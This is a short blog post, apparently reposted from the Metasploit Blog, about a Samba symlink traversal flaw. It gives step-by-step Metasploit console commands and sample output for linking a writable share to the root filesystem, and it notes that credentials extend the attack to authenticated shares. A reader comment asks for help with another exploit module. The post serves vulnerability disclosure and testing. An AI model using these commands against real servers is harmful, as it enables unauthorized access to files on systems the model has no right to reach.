Exploiting the Samba Symlink Traversal

Last night a video uploaded to Youtube, demonstrated a logic flaw in the Samba CIFS service. It was soon followed by a mailing list post. This bug allows any user with write access to a file share to create a symbolic link to the root filesystem, which allows access to any file on the system with the current users’ privileges. This bug affects any Samba service that allows anonymous write access, however read access to the filesystem is still limited by normal user-level privileges. In most cases, anonymous users are limited to the ‘nobody’ account, thus limiting the damage possible through this exploit.

A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:

$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST

msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared

msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted

msf auxiliary(samba_symlink_traversal) > run

[*] Connecting to the server…
[*] Trying to mount writeable share ‘shared’…
[*] Trying to link ‘rooted’ to the root filesystem…
[*] Now access the following share to browse the root filesystem:
[*] \

Keep in mind that non-anonymous shares can be used as well, just set SMBUser and SMBPass with valid user account credentials.

Source: Metasploit Blog

1 comment to Exploiting the Samba Symlink Traversal

  • Dear Sir,I just tried to use ms06_067_keyframe from metaploit.Iam using backrtack 5 R2, i located the exploit in /opt/metasploit/msf3/modules/exploits/windows/browser.but when i try to use it, it shows failed to load module errorwhat can i do to solve the problewm..regardsPrasannaa

Leave a Reply

You can use these HTML tags

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>